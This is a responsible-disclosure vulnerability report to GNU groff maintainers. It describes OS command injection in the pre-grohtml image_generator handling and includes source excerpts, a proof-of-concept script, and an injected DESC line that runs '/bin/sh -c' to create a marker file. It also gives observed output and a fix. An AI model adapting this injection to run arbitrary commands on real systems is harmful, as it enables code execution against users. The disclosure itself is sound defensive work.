Hello maintainers, we have discovered a injection bug in the new version of
groff.
# GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml
image_generator handling via crafted devhtml/DESC
## Summary
- **CWE**: CWE-78 (Improper Neutralization of Special Elements used in an
OS Command / OS Command Injection)
- **Vendor**: GNU Project
- **Product**: GNU groff (`pre-grohtml` / `groff -Thtml` pipeline)
- **Affected Version(s)**: GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e` (tested as GNU groff 1.24.0)
- **Affected Component(s)**:
- `src/preproc/html/pre-html.cpp`, `get_image_generator()` — reads the
`image_generator` directive from the `devhtml/DESC` device description
selected through the groff font/device search path.
- `src/preproc/html/pre-html.cpp`, `imageList::createPage()` — inserts
the `image_generator` string directly into a shell command string.
- `src/preproc/html/pre-html.cpp`, `html_system()` — executes the
constructed command string with `system()`.
- **Attack Type / Vector**: Local — via a crafted groff font/device
directory supplied with `-F`, containing a malicious `devhtml/DESC`
`image_generator` directive, when `groff -Thtml` processes input that
triggers image generation.
- **Impact**: Arbitrary command execution with the privileges of the user
running `groff -Thtml`.
This report is independent from the companion GNU groff `eqn` CWE-121
report. They affect different groff components and different attack
surfaces: this issue is command injection in the HTML preprocessing
pipeline, while the companion report is a stack-based buffer overflow in
the `eqn` parser.
---
## Technical Details / Root Cause
In GNU groff, the HTML output pipeline uses `pre-grohtml` to prepare input
for HTML formatting and to generate images for content such as equations.
`pre-grohtml` reads device-description files from the groff font/device
search path. The normal `groff -F <font-directory>` option can select an
alternate font/device directory, including an alternate `devhtml/DESC` file.
The vulnerability is in the interaction between the `image_generator`
directive in `devhtml/DESC` and shell command construction in `pre-grohtml`:
1. **Attacker-controlled device directive is read from the selected font
path**: `get_image_generator()` opens `devhtml/DESC` through
`font_path.open_file()`, then returns the text after the `image_generator`
keyword without shell escaping, validation, or restriction:
```cpp
static char *get_image_generator(void)
{
char *pathp;
FILE *f;
char *generator = 0 /* nullptr */;
const char keyword[] = "image_generator";
const size_t keyword_len = strlen(keyword);
f = font_path.open_file(devhtml_desc, &pathp);
if (0 /* nullptr */ == f)
fatal("cannot open file '%1': %2", devhtml_desc, strerror(errno));
int lineno = 0;
while (get_line(f, pathp, lineno++)) {
char *cursor = linebuf;
size_t limit = strlen(linebuf);
char *end = linebuf + limit;
if (0 == (strncmp(linebuf, keyword, keyword_len))) {
cursor += keyword_len;
// At least one space or tab is required.
if(!(' ' == *cursor) || ('\t' == *cursor))
continue;
cursor++;
while((cursor < end) && ((' ' == *cursor) || ('\t' == *cursor)))
cursor++;
if (cursor == end)
continue;
generator = cursor;
}
...
}
free(pathp);
fclose(f);
return generator;
}
```
2. **The directive is stored as the global image generator command**:
During startup, `main()` copies the returned string into `image_gen`:
```cpp
image_gen = strsave(get_image_generator());
if (0 /* nullptr */ == image_gen)
fatal("'image_generator' directive not found in file '%1'",
devhtml_desc);
```
At this point, a crafted `devhtml/DESC` can make `image_gen` contain
shell syntax such as `/bin/sh -c 'touch /tmp/marker' #`.
3. **The directive is concatenated into a shell command**: When HTML output
requires image generation, `imageList::createPage()` constructs a command
string and places `image_gen` at the beginning of the command:
```cpp
int imageList::createPage(int pageno)
{
...
const char *s = make_string("ps2ps -sPageList=%d %s %s",
pageno, psFileName, psPageName);
html_system(s, 1);
assert(strlen(image_gen) > 0);
s = make_string("echo showpage | "
"%s%s -q -dBATCH -dSAFER "
"-dDEVICEHEIGHTPOINTS=792 "
"-dDEVICEWIDTHPOINTS=%d -dFIXEDMEDIA=true "
"-sDEVICE=%s -r%d %s "
"-sOutputFile=%s %s -",
image_gen,
EXE_EXT,
(getMaxX(pageno) * image_res) / postscriptRes,
image_device,
image_res,
antiAlias,
imagePageName,
psPageName);
html_system(s, 1);
free(const_cast<char *>(s));
...
}
```
4. **The constructed string is executed by the shell**: `html_system()`
passes the constructed command string to `system()`:
```cpp
static void html_system(const char *s, int redirect_stdout)
{
...
int status = system(s);
...
}
```
`system()` invokes `/bin/sh -c`, so shell metacharacters and shell
syntax in `image_generator` are interpreted semantically. A trailing `#` in
the malicious directive comments out the rest of the command appended by
`pre-grohtml`.
No neutralization occurs anywhere on this path. The `image_generator` value
is selected from an attacker-controlled device-description file,
concatenated into a shell command, and executed with `system()`.
---
## Reproduction (PoC)
The command injection is reproducible on the default upstream build of GNU
groff on Linux. The PoC below creates a valid alternate font/device
directory by copying the stock `devhtml` and `devps` device descriptions,
then changes only the `image_generator` directive.
```sh
cd ~/groff_master
rm -rf /tmp/groff_font_cwe78 /tmp/groff_prehtml_cwe78_master
mkdir -p /tmp/groff_font_cwe78/devhtml /tmp/groff_font_cwe78/devps
# Preserve valid device descriptions and modify only image_generator.
cp font/devhtml/DESC /tmp/groff_font_cwe78/devhtml/DESC
cp font/devps/DESC /tmp/groff_font_cwe78/devps/DESC
python3 - <<'PY'
p = '/tmp/groff_font_cwe78/devhtml/DESC'
lines = open(p).read().splitlines()
out = []
for line in lines:
if line.startswith('image_generator'):
out.append("image_generator /bin/sh -c 'touch
/tmp/groff_prehtml_cwe78_master' #")
else:
out.append(line)
open(p, 'w').write('\n'.join(out) + '\n')
PY
# Use an equation to trigger HTML image generation.
cat > /tmp/eqn_image_cwe78.roff <<'R'
.EQ
a over b
.EN
R
./test-groff -F /tmp/groff_font_cwe78 -e -Thtml /tmp/eqn_image_cwe78.roff \
>/tmp/groff_html_master.out 2>/tmp/groff_html_master.err
echo "exit=$?"
ls -l /tmp/groff_prehtml_cwe78_master
sed -n '1,8p' /tmp/groff_html_master.err
```
The PoC uses two small files/directories. The relevant modified line in
`/tmp/groff_font_cwe78/devhtml/DESC` is:
```text
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
```
The input document `/tmp/eqn_image_cwe78.roff` is intentionally minimal;
its only purpose is to trigger HTML image generation:
```roff
.EQ
a over b
.EN
```
Observed result on Ubuntu 24.04 (`gcc 13.3.0`, default `./bootstrap &&
./configure && make`), using GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e`:
```text
GNU groff version 1.24.0
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
master exit=0
MASTER_MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:22 /tmp/groff_prehtml_cwe78_master
pamcut: Error reading first byte of what is expected to be a Netpbm magic
number. Most often, this means your input file is empty
pnmcrop: Error reading first byte of what is expected to be a Netpbm magic
number. Most often, this means your input file is empty
pnmtopng: Error reading first byte of what is expected to be a Netpbm magic
number. Most often, this means your input file is empty
pre-grohtml: command 'pamcut 115 3 9 29 < /tmp/groff-page-0AmDwB | pnmcrop
-quiet| pnmtopng -quiet -background rgb:f/f/f -transparent rgb:f/f/f>
grohtml-2210740-2.png' returned status 1
```
The marker file `/tmp/groff_prehtml_cwe78_master` is created by the command
embedded in `devhtml/DESC`. This confirms semantic command execution in the
stock compiled binary. The later `pamcut`/`pnmcrop` diagnostics occur only
because the PoC replaces the expected Ghostscript program with a
marker-file command; they are not required for command execution.
A final verification run after report formatting used a fresh marker file
and reproduced the same semantic injection:
```text
groff -F malicious -e -Thtml exit=0
MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:29 /tmp/reverify_cwe78_marker
```
---
## Fix / Mitigation
Avoid executing a shell command constructed from a device-description
string. The `image_generator` directive should be treated as an executable
path or command name, not as shell syntax.
**Recommended fix**: Replace the `system()` call with a direct `fork()` +
`execvp()` style invocation of the image generator using an `argv` array.
This ensures that the image-generator path and its arguments are passed as
separate arguments and cannot be interpreted as shell commands.
If configurable arguments are required, parse them with a shell-free
tokenizer and pass each token as a separate `argv` element. Do not pass the
resulting string through `/bin/sh -c`.
### Recommended Mitigations
- **Preferred**: Replace `system()` in the image-generation path with a
shell-free process invocation (`fork()` + `execvp()` or equivalent).
- If patching is not immediately possible:
- Do not run `groff -Thtml` with untrusted `-F` font/device directories.
- Do not allow untrusted users to supply `devhtml/DESC` files.
- Pin groff's font/device path to a trusted directory and sandbox the
formatter when processing untrusted input.
Thank you.